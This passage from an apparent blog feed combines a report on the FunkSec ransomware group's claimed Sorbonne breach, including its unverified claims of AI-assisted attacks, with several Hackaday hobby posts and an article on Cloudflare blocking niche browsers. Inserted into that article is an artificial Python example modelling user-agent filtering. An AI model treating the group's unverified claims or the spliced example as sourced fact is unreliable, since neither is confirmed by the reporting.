Analysis of their ransomware suggests the code was developed with the assistance of artificial intelligence, allowing the group to iterate quickly on versions despite the limited technical experience of its members. This raises questions about the real threat posed by FunkSec and about the difficulty of distinguishing hacktivism from cybercrime in today's ransomware ecosystem.

The group reportedly operates on the double-extortion model: it not only encrypts the victims' data but also exfiltrates a copy in order to threaten its publication if the ransom is not paid. This approach complicates the defensive strategy, since simply restoring systems from backups would not be enough to mitigate the reputational and legal damage from the release of the stolen information.

FunkSec claims to integrate artificial intelligence into 30% of its operational processes, although there is no independent evidence to support this claim. According to its statements, AI would be used to:

  • Automate highly targeted phishing attacks
  • Build custom tools for exploiting vulnerabilities
  • Analyze and prioritize potential victims more efficiently


AI in Cybercrime: A New Frontier for Ransomware?


The use of artificial intelligence in cybercrime is not entirely new, but the growing sophistication of these tools is fuelling a new wave of threats. If Funksec's claims were confirmed, we would be facing a group that uses advanced tools to automate complex operations, reducing the need for manual skills and increasing the effectiveness of its attacks.

AI's applications in cybercrime could include:

  • Generating more realistic phishing campaigns
  • Identifying vulnerabilities with predictive techniques
  • Developing malware capable of evading traditional security systems

Nevertheless, most of the ransomware in circulation today still relies on well-established techniques, such as exploiting compromised credentials or unpatched vulnerabilities. Artificial intelligence could speed up these processes, but it has not yet revolutionized the threat landscape.

Conclusions


At present, the alleged breach claimed by the Funksec ransomware group remains unconfirmed by institutional sources. However, the potential seriousness of the matter, given the strategic nature of the data allegedly stolen, calls for a careful assessment of the risks and countermeasures by the competent authorities.

RHC continuerà a monitorare la situazione e pubblicherà eventuali ulteriori aggiornamenti qualora emergessero informazioni significative. Invitiamo chiunque sia a conoscenza di dettagli rilevanti a contattarci attraverso la mail crittografata del whistleblower, garantendo la possibilità di rimanere anonimi.

L'articolo Sorbonne Université nel mirino di Funksec: il gruppo ransomware rivendica un attacco proviene da il blog della sicurezza informatica.


Fixing an Unpleasant SD Card Slot Issue In a NanoVNA


SD cards and the much smaller microSD cards are found on many devices, with the card often accessible from outside the enclosure. Unfortunately there's a solid chance that a card, especially a tiny microSD card, will find its way past the card reader slot and into the enclosure. This is what happened to [Rob] of the SevenFortyOne Radios and Repairs channel on YouTube with a NanoVNA unit. While shaking the unit, you can clearly hear the microSD card rattling inside, courtesy of the rather large gap above the card slot.

After a quick teardown and extracting the lost microSD card, the solution to prevent this is a simple bit of foam stuck on top of the microSD card slot, so that the too large opening in the enclosure is now fully blocked. It’s clearly a bit of a design fail in this particular NanoVNA unit, worsened by the tiny size of the card and having to use a fingernail to push the card into the slot as it’s so far inside the enclosure.

While [Rob] seems to blame himself for this event, we’d chalk it mostly up to poor design. It’s an issue that’s seen with certain SBC enclosures and various gadgets too, where losing a microSD card is pretty much a matter of time, and hugely fiddly at the best of times. That said, what is your preferred way of handling microSD card insertion & removal in devices like these?

youtube.com/embed/4-mij2XYdUQ?…


hackaday.com/2025/03/09/fixing…


The Coolest Batteries You’ve Never Heard Of


ice forming on surface with plus and minus pole

Imagine cooling your building with the same principle that kept Victorian-era icehouses stocked with lake-frozen blocks, but in modern form. That's the idea behind ice batteries, a clever energy storage hack that's been quietly slashing cooling costs across commercial buildings. The idea is to freeze water when energy is cheap and use that stored cold later, turning major power hogs (air conditioning, we're looking at you) into more efficient, cost-effective systems.

Pioneers like Nostromo Energy and Ice Energy are refining the tech. Nostromo’s IceBrick modules pack 25 kWh of cooling capacity each, install on rooftops, and cost around $250 per kWh—about half the price of lithium-ion storage. Ice Energy’s Ice Bear 40 integrates with HVAC systems, shifting up to 95% of peak cooling demand to off-peak hours. And for homes, the Ice Bear 20 replaces traditional AC units while doubling as a thermal battery.

Unlike lithium-ion, ice batteries don’t degrade chemically – their water is endlessly reusable. Combining the technology with this hack, it’s even possible in environments where water is scarce. But the trade-off? They only store cooling energy. No frozen kilowatts for your lightbulbs, just an efficient way to handle the biggest energy drain in most buildings.

Could ice batteries help decentralize energy storage? They’re already proving their worth in high-demand areas like California and Texas. Read the full report here and let us know your thoughts in the comments.

Original photo by Kelly Sikkema on Unsplash


hackaday.com/2025/03/09/the-co…


Game Over: Cloudflare and the chaos on less popular browsers!


Users of some less popular browsers are complaining about problems accessing various sites caused by the way Cloudflare's systems work. The Register's journalists report that their attention was drawn to the issue by users, information security specialists and the developers of the open source Pale Moon browser.

It appears that users regularly complain on the Cloudflare forum about websites being unavailable, but the company does not seem to pay attention. For example, the researchers found reports of problems with Cloudflare blocking websites dating back to 2015, 2022, March and July 2024, and January 2025.

The problems arise because Cloudflare aims to fight botnets and DDoS attacks by detecting and blocking any suspicious activity, for example infected devices that are part of botnets and run certain scripts. One way to detect them is to check the browser's user agent and, if it does not come from a known browser, block it.

Unfortunately the list of acceptable browsers is limited and includes only the latest versions of well-known browsers such as Chrome (and its many derivatives) and Firefox. As a rule, users of the latest versions of the Pale Moon, Falkon and SeaMonkey browsers run into blocking problems.

The latest Pale Moon release notes indicate that the developers are trying to address this problem, which often causes the browser to freeze, stop responding to requests or crash the system. Some users of Firefox 115 ESR (the last version for macOS 10.13 and Windows 7) also experience blocking problems. Sites frequently affected by the problem include science.org, steamdb.info, convertapi.com and even community.cloudflare.com.

At the same time, according to some participants in the discussion of the problem on Hacker News, Cloudflare may treat as suspicious not only the use of niche browsers or operating systems, but also a request for a URL that carries no referrer. While a privacy-conscious user may block tracking, for the CDN provider such activity is a signal that the actions are not being performed by a human.

The journalists point out that Cloudflare's technical support is mainly focused on business customers and that ordinary users can only complain about what is happening on the community forums. However, judging by the number of messages about the blocking, the company does not monitor the forums for problem reports.

The article Game Over: Cloudflare and the chaos on less popular browsers! comes from il blog della sicurezza informatica.
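Added example (not from The Register, Cloudflare or this article): a small Python model of the user-agent allowlist behaviour described above, using constructed, approximate User-Agent strings, that shows why a "latest Chrome/Firefox only" policy rejects Pale Moon, Falkon, SeaMonkey and Firefox 115 ESR together with a script client, next to a risk-scored check that treats a missing Referer as only a weak signal. The version floors and score weights are assumptions for illustration.

```python
# Added illustration of the over-blocking failure mode, not Cloudflare's logic.
import re

# Constructed, approximate User-Agent strings; not captured from real traffic.
SAMPLE_UAS = {
    "chrome": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36",
    "firefox_115_esr": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:115.0) "
                       "Gecko/20100101 Firefox/115.0",
    "palemoon": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) "
                "Gecko/20100101 Goanna/6.6 Firefox/102.0 PaleMoon/33.6.0",
    "falkon": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "
              "Falkon/24.08.0 QtWebEngine/6.7.2 Chrome/118.0.5993.220 Safari/537.36",
    "seamonkey": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 "
                 "Firefox/91.0 SeaMonkey/2.53.18",
    "script": "python-requests/2.32.3",
}

# Product tokens checked most-specific first: Pale Moon, SeaMonkey and Falkon
# also carry a Firefox/ or Chrome/ token for compatibility.
FAMILIES = ("PaleMoon", "SeaMonkey", "Falkon", "Firefox", "Chrome")

def parse_ua(ua):
    """Return (family, major_version), or (None, None) for an unrecognized UA."""
    for family in FAMILIES:
        m = re.search(rf"{family}/(\d+)", ua)
        if m:
            return family, int(m.group(1))
    return None, None

# Naive policy as the article describes it: only recent Chrome/Firefox pass.
# The version floors are assumed values for this example.
LATEST_ONLY = {"Chrome": 130, "Firefox": 130}

def naive_allow(ua):
    """True only for a current Chrome/Firefox; every niche browser fails here."""
    family, major = parse_ua(ua)
    return family in LATEST_ONLY and major >= LATEST_ONLY[family]

def scored_decision(ua, referer=None, block_at=3):
    """Weigh signals instead of hard-allowlisting; 'allow', 'challenge' or 'block'."""
    family, _ = parse_ua(ua)
    score = 0
    if not ua.startswith("Mozilla/"):  # non-browser client string: strong signal
        score += 3
    if family is None:                  # unknown product token: moderate signal
        score += 1
    if referer is None:                 # typed URLs have no Referer: weak signal only
        score += 1
    if score >= block_at:
        return "block"
    return "challenge" if score >= 2 else "allow"
```

With the sample strings, `naive_allow` accepts only the Chrome entry, while `scored_decision` lets the niche browsers through even without a Referer and still blocks the bare script client.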


Retrotechtacular: Better Living Through Nuclear Chemistry


The late 1950s were such an optimistic time in America. World War II had been over for less than a decade, the economy boomed thanks to pent-up demand after years of privation, and everyone was having babies — so many babies. The sky was the limit, especially with new technologies that promised a future filled with miracles, including abundant nuclear power that would be “too cheap to meter.”

It didn’t quite turn out that way, of course, but the whole “Atoms for Peace” thing did provide the foundation for a lot of innovations that we still benefit from to this day. This 1958 film on “The Armour Research Reactor” details the construction and operation of the world’s first privately owned research reactor. Built at the Illinois Institute of Technology by Atomics International, the reactor was a 50,000-watt aqueous-homogenous design using a solution of uranyl sulfate in distilled water as its fuel. The core is tiny, about a foot in diameter, and assembled by hand right in front of the camera. The stainless steel sphere is filled with 90 feet (27 meters) of stainless tubing to circulate cooling water through the core. Machined graphite reflector blocks surrounded the core and its fuel overflow tank (!) before the reactor was installed in “biological shielding” made from super-dense iron ore concrete with walls 5 feet (1.5 m) thick — just a few of the many advanced safety precautions taken “to ensure completely safe operation in densely populated areas.”

While the reactor design is interesting enough, the control panels and instrumentation are what really caught our eye. The Fallout vibe is strong, including the fact that the controls are all right in the room with the reactor. This allows technicians equipped with their Cutie Pie meters to insert samples into irradiation tubes, some of which penetrate directly into the heart of the core, where neutron flux is highest. Experiments included the creation of radioactive organic compounds for polymer research, radiation hardening of those new-fangled transistors, and manufacturing radionuclides for the diagnosis and treatment of diseases.

This mid-century technological gem might look a little sketchy to modern eyes, but the Armour Research Reactor had a long career. It was in operation until 1967 and decommissioned in 1972, and similar reactors were installed in universities and private facilities all over the world. Most of them are gone now, though, with only five aqueous-homogenous reactors left operating today.

youtube.com/embed/2Y3JsQ3evcM?…


hackaday.com/2025/03/08/retrot…


Fictional Computers: EMERAC was the Chatbot of 1957


Movies mirror the time they were made. [ErnieTech] asserts that we can see what people thought about computers back in 1957 by watching the classic Spencer Tracy/Katharine Hepburn movie “Desk Set.” What’s more, he thinks this might be the first movie appearance of a human-like computer. On a side note, in the UK this movie was known as “The Other Woman.”

The story is about an MIT computer expert computerizing a broadcasting company who, of course, finds romance and, at least towards the end, comedy.

Of course, we are interested in the computer. It was supposedly an IBM machine and while IBM apparently provided some equipment (probably typewriters and tape drives), the computer is clearly just a ton of light bulbs. It was named Emmie, which was a nickname for EMERAC. Oddly enough, it worked much like a modern web search engine or chatbot, answering random research questions. The difference is they had fed all the world's knowledge into it themselves using punched cards.

The video has spoilers, but for a movie made in 1957, that's not really an issue. The ending is pretty predictable, anyway. As with many people in 1957, there was a fear that "computers were going to take all our jobs!" [Ernie] makes the point that this was a common trope where the computer would run the enterprise and then make a big mistake, and everyone realized we still needed humans. EMERAC later guest-starred in the movie "The Fly." It was just a background player in the chorus, though.

He also points out that many of the things people thought about the widespread adoption of computers are still true today if you replace computer with AI. Turns out, you still need to know how to reset the system.

[Ernie] did a video about Colossus last month, a topic we also visited last year. One of our favorite fictional computers, though, was more recent from “The Three Body Problem.”

youtube.com/embed/ckrUWOnlwkA?…


hackaday.com/2025/03/08/fictio…


Writing an OLED Display Driver in MicroZig


Although most people would use C, C++ or MicroPython for programming microcontrollers, there are a few more obscure options out there as well, with MicroZig being one of them. Recently [Andrew Conlin] wrote about how to use MicroZig with the Raspberry Pi RP2040 MCU, showing the process of writing an SSD1306 OLED display driver and running it. Although MicroZig has since published a built-in version, the blog post gives a good impression of what developing with MicroZig is like.

Zig is a programming language which seeks to improve on the C language, adding memory safety, safe pointers (via option types), while keeping as much as possible of what makes C so useful for low-level development intact. The MicroZig project customizes Zig for use in embedded projects, targeting platforms including the Raspberry Pi MCUs and STM32. During [Andrew]’s usage of MicroZig it was less the language or supplied tooling that tripped him up, and more just the convoluted initialization of the SSD1306 controller, which is probably a good sign. The resulting project code can be found on his GitHub page.


hackaday.com/2025/03/08/writin…


Expensive Camera, Cheap 3D-Printed Lens


If you’re a photography enthusiast, you probably own quite a few cameras, but the chances are your “good” one will have interchangeable lenses. Once you’ve exhausted the possibilities of the kit lens, you can try different focal lengths and effects, but you’ll soon find out that good glass isn’t cheap. Can you solve this problem by making your own lenses? [Billt] has done just that.

Given some CAD skills, it’s possible to replicate the mount on an existing lens, but he takes a shortcut by using a readily available camera cap project. There are two lenses detailed in the video below the break; the first is a plastic lens from a disposable camera, while the second takes one from a Holga toy camera. The plastic lens is inserted mid-print, giving the colour aberrations and soft focus you’d expect, while the Holga lens is mounted on a slide for focusing. There may be some room for improvement there, but the result is a pair of fun lenses for experimentation for not much outlay. Given the number of broken older cameras out there, it should be relatively easy for anyone wanting to try this for themselves to have a go.

The video is below the break, but while you’re on this path, take a look at a previous project using disposable camera lenses. Or, consider printing an entire camera.

youtube.com/embed/S5-6ZxoWP7Q?…


hackaday.com/2025/03/08/expens…